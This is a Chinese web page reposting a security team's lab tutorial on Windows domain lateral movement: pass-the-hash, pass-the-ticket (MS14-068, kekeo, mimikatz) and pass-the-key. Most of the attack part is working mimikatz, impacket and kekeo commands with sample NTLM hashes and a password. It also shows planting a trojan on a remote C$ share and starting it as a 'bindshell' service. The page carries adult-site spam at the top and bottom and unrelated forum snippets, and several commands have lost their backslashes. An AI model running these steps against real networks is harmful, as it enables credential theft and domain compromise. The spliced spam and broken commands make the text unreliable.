在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

什么是PTH?PTH利用手法介紹

jf_vLt34KHi ? 來源:Tide安全團隊 ? 2023-05-16 09:44 ? 次閱讀

PTH

什么是PTH?

pass the hash:哈希傳遞攻擊,簡稱PTH,是在內網滲透中一種很經典的攻擊方式,原理就是攻擊者可以直接通過LM Hash或NTLM Hash訪問遠程主機或服務,而不用提供明文密碼。在域環境中,用戶登錄計算機時使用的大部分都是域賬號,大量計算機在安裝時會使用相同的本地管理員賬戶密碼。因此,如果計算機的本地管理員賬號和密碼也是相同的,攻擊者就可以使用哈希傳遞的方法登錄到內網主機的其他計算機。因此,此類攻擊適用于:

?域/工作組環境

?可以獲得hash,但是條件不允許對hash進行爆破

?內網中存在和當前機器相同的密碼

另外需要注意在Windows server 2012 R2 之前使用到的密碼散列值是LM Hash、NTLM Hash,在2012 R2及其版本之后使用到的密碼散列值是NTLM Hash。

PTH利用手法

當前演示環境如下:

92b64c2c-f329-11ed-90ce-dac502259ad0.png

如上圖,該內網環境,域名為gog.org,共有3臺機器,其中攻擊者已經拿下了與該環境的Webserver,并讀取到了該機器中的hash,接下來讓我們嘗試通過哈希傳遞的方式獲取內網其他兩臺機器的控制權

mimikatz

其中我們的神器mimikatz就可以進行PTH攻擊,但是mimikatz中的PTH攻擊會在當前目標機器桌面中彈一個cmd窗口,所以不適合CS使用,適合獲得當前目標桌面權限后再使用該命令去進行橫向移動。首先我們先在Webserver中上傳mimikatz,并讀取hash:

privilege::debug#提升權限
sekurlsa::logonpasswords#抓取密碼
92d5665c-f329-11ed-90ce-dac502259ad0.png

獲得本地管理員用戶的Hash后,用mimikatz將administrator的hash添加到lsass進程中

sekurlsa::pth/user:administrator/domain:192.168.3.32/ntlm:518b98ad4178a53695dc997aa02d455c
92f7ac58-f329-11ed-90ce-dac502259ad0.png

成功后會彈出一個新的cmd窗口,這時再去訪問遠程主機服務,就不需要提供明文密碼了,直接連接即可

9331d572-f329-11ed-90ce-dac502259ad0.png

這時我們將192.168.3.32上線到CS中,就可使用將木馬復制到該機器中,然后使用sc創建一個服務綁定木馬,然后啟動該服務上線即可,具體實現命令如下:

copy4444.exe\192.168.3.32c$#上傳木馬到目標機器中
sc\192.168.3.32createbindshellbinpath="c:4444.exe"#創建shell服務并綁定文件
93747ef4-f329-11ed-90ce-dac502259ad0.png9396748c-f329-11ed-90ce-dac502259ad0.png

可以看到目標機器中已經創建了bindshell服務,這里我們直接啟用該服務即可

sc\192.168.3.32startbindshell#啟動bindshell服務
93c01f1c-f329-11ed-90ce-dac502259ad0.png

啟動之后3.32成功上線。但是,在使用mimikatz進行哈希傳遞攻擊時需要注意以下幾點:

1.使用mimikatz進行哈希傳遞要具有本地管理員權限

2.dir命令后面盡量跟主機名,否則可能會報錯

impacket套件

除了mimikatz之外,像之前我們提到的impacket中的smbexec、wmiexec、psexec都可以進行PTH攻擊。pythonpsexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.32"whoami"

93d1cf64-f329-11ed-90ce-dac502259ad0.png

pythonwmiexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32"whoami"
93f090ac-f329-11ed-90ce-dac502259ad0.png
pythonsmbexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32
940cdc8a-f329-11ed-90ce-dac502259ad0.png

PTT

pass the ticket:票據傳遞攻擊,簡稱PTT,利用的票據憑證TGT進行的橫向移動,它是利用Kerberos協議進行攻擊的,這里介紹三種常見的攻擊方法:MS14-068、Golden Ticket、SILVER ticket,簡單來說就是將連接合法的票據注入到內存中實現連接。缺點:票據是有效期的,一般默認為10小時。

MS14-068

MS14-068是密鑰分發中心(KDC)服務中的Windows漏洞,它允許經過身份驗證的用戶在其Kerberos票據(TGT)中插入任意PAC。該漏洞位于kdcsvc.dll域控制器的密鑰分發中心(KDC)中,用戶可以通過呈現具有改變的PAC的Kerberos TGT來獲得票證。MS14-068所造成的危害是允許域內任何一個普通用戶都可以將自己提升為域管權限。微軟給出的修復補丁是KB3011780,漏洞攻擊是否成功要看目標機器打沒打KB3011780補丁。

漏洞利用

可以看到當前我們所處的身份是域內的一個普通用戶,是無法對域控進行文件操作的。

94256cbe-f329-11ed-90ce-dac502259ad0.png

這里我們第一步先獲取當前機器的SID

shellwhoami/user
9441e164-f329-11ed-90ce-dac502259ad0.png

拿到SID后,使用我們的ms14-068.exe生成一個票據文件。-u指定當前用戶,-s 輸入我們剛剛獲取到的SID,-p輸入當前用戶密碼,具體命令如下

shellms14-068.exe-uwebadmin@god.org-sS-1-5-21-1218902331-2157346161-1782232778-1132-d192.168.3.21-padmin!@#45
945891de-f329-11ed-90ce-dac502259ad0.png

執行該命令后可以看到當前目錄生成了一個票據文件。

947b0048-f329-11ed-90ce-dac502259ad0.png

這里生成票據文件后,就可以嘗試連接目標看能否進行操作 首先清除下票據,以防該連接是以之前的票據進行連接的

shellklistpurge
9491ff32-f329-11ed-90ce-dac502259ad0.png

票據為空后,這里我們直接開始使用mimikatz導入票據,之后再來查看當前電腦的票據信息,看其是否有產生新的票據

mimikatzkerberos::ptcTGT_webadmin@god.org.ccache
shellklist
94affdf2-f329-11ed-90ce-dac502259ad0.png

票據為空后,這里我們直接嘗試與目標主機進行連接創建服務進行上線(這里建議在連接時,使用主機名進行連接,IP地址容易產生失敗的問題)

shellnetuse\OWA2010CN-GODc$
shellcopy4444.exe\OWA2010CN-GODc$
shellsc\OWA2010CN-GODcreatebinshel1binpath="c:4444.exe"
shellsc\OWA2010-GODstartbinshel1
94dadf90-f329-11ed-90ce-dac502259ad0.png94fe30f8-f329-11ed-90ce-dac502259ad0.png

成功執行上線到CS,相對來說,MS14-068這個漏洞利用條件較為簡單,如果域控沒有打KB3011780補丁,哪怕一個普通用戶權限也可以去嘗試該漏洞進行利用。

kekeo

利用獲取到的NTLM生成新的票據去嘗試,成功與否看NTLM是否正確 缺點:票據是有效期的,所以如果當前主機在鏈接過域控的話,有效期內可利用。kekeo和下面的mimikatz與剛剛我們上面的ms14-068原理不太一樣,ms14-068是基于漏洞,去允許域內任何一個普通用戶將自己提升為域管權限,而kekeo和mimikatz是基于hash生成票據,然后再進行連接。這里假設我們已經通過橫向其他機器,拿到了域控的hash,然后通過kekeo來偽造票據進行連接。

95102772-f329-11ed-90ce-dac502259ad0.png

首先來看我們現在跳板機中的票據是空的

shellklist
952dd736-f329-11ed-90ce-dac502259ad0.png

然后上傳我們的kekeo文件,首先先生成票據

shellkekeo"tgt::ask/user:Administrator/domain:god.org/ntlm:ccef208c6485269c20db2cad21734fe7""exit"
9545e7a4-f329-11ed-90ce-dac502259ad0.png

生成好后,可以看到當前目錄會生成一個文件

955c3446-f329-11ed-90ce-dac502259ad0.png

該文件就是我們剛剛所生成的票據文件,接下來我們將它導入到內存中后,再來看我們的當前跳板機中有沒有新增票據

shellkekeo"kerberos::pttTGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi""exit"
shellklist
95784f32-f329-11ed-90ce-dac502259ad0.png

可以看到成功導入了一個票據,那這里我們對域控進行嘗試連接

shelldir\owa2010cn-godc$
95ad298c-f329-11ed-90ce-dac502259ad0.png

成功連接,那現在我相信大家可能都有一個疑問,就是現在都有了hash了,我直接使用pth去橫向他不是更方便嗎,為什么還要多此一舉去生成票據之后,再用票據去進行橫向呢?當然也是可以的,但是因為pth他所基于的協議,如smb、wmi、icp等,他們都依賴于135、445、139等端口等,那如果在環境中,出現端口、協議被禁用的情況的話,可以嘗試使用得到的hash生成票據來進行橫向。

MIMIKATZ

因為當前主機肯定之前與其他主機連接過,所以本地應該生成了一些票據,我們可以導出這些票據,然后在導入票據,利用,該方法類似于cookie欺騙。去利用歷史遺留的票據重新認證嘗試,成功與否看當前主機有沒有被目標主機連接過。缺點:需要高權限用戶 在進行本實驗之前,需要先模擬一下域管用戶在本機上的連接操作,留下票據之后在進行橫向操作(可以在域控中遠程鏈接一下跳板機或向C盤寫入一個文件并認證)。

95cb5542-f329-11ed-90ce-dac502259ad0.png

如上圖,我們假設這條票據是之前域管用戶在跳板機中留下的歷史票據,那這里我們可以使用mimikatz進行偽造票據。首先我們先將內存中的票據導出

mimikatzsekurlsa::tickets/export

導出后可以看到當前目錄會出現一個票據文件

95ee5a06-f329-11ed-90ce-dac502259ad0.png

這里再將其導入到內存中

mimikatzkerberos::pttC:UserswebadminDesktopTGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
96070f06-f329-11ed-90ce-dac502259ad0.png

導入成功后,這里我們直接進行對靶標進行連接

shellnetuse\owa2010cn-godc$
shelldir\OWA2010CN-GODc$
961b50a6-f329-11ed-90ce-dac502259ad0.png

PTK

pass the key:密鑰傳遞攻擊,簡稱PTK,利用的ekeys aes256進行的橫向移動,成功幾率不是很高,利用條件苛刻 漏洞利用條件:當系統安裝了KB2871997補丁且禁用了NTLM的時候,那我們抓取到的NTLM hash就失去了作用,但是可以通過PTK的攻擊方式獲得權限。首先使用mimikatz導出aes值

mimikatzsekurlsa::ekeys
963b56f8-f329-11ed-90ce-dac502259ad0.png

導出后使用我們下面這條命令來進行利用

mimikatzsekurlsa::pth/user:域用戶名/domain:域名/aes256:aes256值
mimikatzsekurlsa::pth/user:administrator/domain:god/aes256:1811e5811877a782b6c11e2b0165ffb88d40a633f922a012372095a43d72d7ae

執行后會在桌面彈出一個cmd窗口,這里就可以進行橫向移動利用,但是上文也講了,該移動方法的利用條件有點苛刻,他是目標系統必須打了KB2871997且禁用了NTLM hash傳遞時,才可以利用,但是由于我們的靶場環境并沒有打KB2871997補丁且沒有禁用NTLM Hash,故無法利用成功。且當一個思路吧。





審核編輯:劉清

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • PTH
    PTH
    +關注

    關注

    0

    文章

    40

    瀏覽量

    17746
  • Hash算法
    +關注

    關注

    0

    文章

    43

    瀏覽量

    7404

原文標題:橫向移動之PTH、PPT、PTK

文章出處:【微信號:Tide安全團隊,微信公眾號:Tide安全團隊】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    PTH08T220W出現脫焊的情況怎么解決?

    PTH08T220W 焊接問題求助。PTH08T220W為非對稱的引腳排列,客戶的SMT后pin 1腳出現脫焊的情況,需要在pin 1引腳加膠水固定。請幫忙給出對策。謝謝!
    發表于 12-16 07:44

    PTH和NPTH的簡單區別

      PTH是沉銅孔(Plating Through Hole),孔壁有銅,一般是過電孔(VIA)及元件孔。  NPTH是非沉銅孔(Non Plating Through Hole),孔壁無銅,一般是定位孔及鑼絲孔。可用干膜封孔或在電鍍前膠粒塞或電鍍后二次鉆孔或啤出。
    發表于 08-29 09:55

    PTH12020 pdf datasheet

    The PTH12020 series of non-isolatedpower modules offers OEM designers acombination of high
    發表于 08-06 16:58 ?32次下載

    PTH12060 pdf datasheet

    The PTH12060 series is a non-isolated power module, and part of a new class of complete dc/dc
    發表于 08-06 16:59 ?14次下載

    PTH05060W pdf datasheet

    The PTH05060W non-isolated powermodule is small in size but big on performanceand flexibility. Its
    發表于 08-06 17:03 ?17次下載

    PTH04T240W,PTH04T241W,pdf(10-A

    The PTH04T240/241W is a high-performance 10-A rated, non-isolated power module. These modules
    發表于 11-16 15:12 ?9次下載

    PTH04T230W,PTH04T231W,pdf(6-A,

    The PTH04T230/231W is a high-performance, 6-A rated, non-isolated power module. This regulator
    發表于 11-16 15:17 ?9次下載

    PTH08T230W,PTH08T231W,pdf(6-A

    The PTH08T230/231W is the higher input voltage (4.5V to 14V) version of the PTH04T230/231W (2.2V
    發表于 11-16 15:24 ?10次下載

    PTH08T240W,PTH08T241W,pdf(10A

    The PTH08T240/241W is a high-performance 10-A rated, non-isolated power module. These modules
    發表于 11-16 15:26 ?17次下載

    PTH04T221W,pdf(16-A, 2.2-V to

    The PTH04T220/221W is the lower input voltage (2.2V to 5.5V) version of the PTH08T220/221W (4.5V
    發表于 11-16 16:12 ?5次下載

    PTH08000W,pdf(2.25 A 4.5-V TO

    The PTH08000W is a highly integrated, low-cost switching regulator module that delivers up to 2.25
    發表于 11-18 12:14 ?9次下載

    PTH12030W,PTH12030L,pdf(26 A,

    The PTH12030 is a series of high current, non-isolated power module from Texas Instruments.
    發表于 11-18 13:45 ?6次下載

    PTH12060W,PTH12060L,pdf(10 A,

    The PTH12060 series is a non-isolatedpower module, and part of a new class of complete dc/dc
    發表于 11-18 13:51 ?11次下載

    PTH與NPTH的區別及用途

    PCB板設計中,孔有四個作用:電氣導通、定位、散熱、方便分板。而孔又分導通孔(PTH)和非導通孔(NPTH),而在一般的設計中,只有PTH孔有孔環(見下圖),NPTH孔是不具備有孔環的,但是一些特殊情況也會將NPTH孔設計孔環(這時候的孔環起到接地作用)。
    的頭像 發表于 05-23 14:53 ?7w次閱讀

    了解pcb制造中的PTH工藝

    化學鍍銅,我們也稱為鍍通孔(PTH),它是一種自催化氧化還原反應。 PTH工藝在鉆完兩層或更多層后進行。
    的頭像 發表于 07-29 09:49 ?2.9w次閱讀
    了解pcb制造中的<b class='flag-5'>PTH</b>工藝
    主站蜘蛛池模板: 午夜影视免费观看| 欧美成人免费网站| 国产精品三级在线观看| 欧美一级免费看| 手机午夜视频| 久操视频在线免费观看| 91福利免费视频| 夜操| 亚洲福利午夜| 国内亚州视频在线观看| 日本黄色视| 久久久免费视频观看| 国产成人a毛片| 天天色天天爽| 亚洲丁香网| 人人艹人人草| 婷婷丁香啪啪| 在线观看黄色x视频| 亚洲一区区| 8888奇米四色在线| 免费男女视频| 国产精品女丝袜白丝袜| 中文一区在线观看| 欧美亚洲综合另类型色妞| 亚洲一区二区三区深夜天堂| 在线成人亚洲| 国产精品久久久久久一级毛片 | 年轻护士3的滋味| 国产精品嫩草影院一二三区| 天天爽天天操| 最近在线观看免费完整视频| 99精品偷自拍| 日本免费一区二区在线观看| 性欧美性free| 久久综合丁香| 午夜视频在线观看国产www| 波多野结衣三个女人蕾丝边| 性猛交毛片| 最好免费高清视频观看韩国| 日鲁夜鲁鲁狠狠综合视频| 国产高清免费|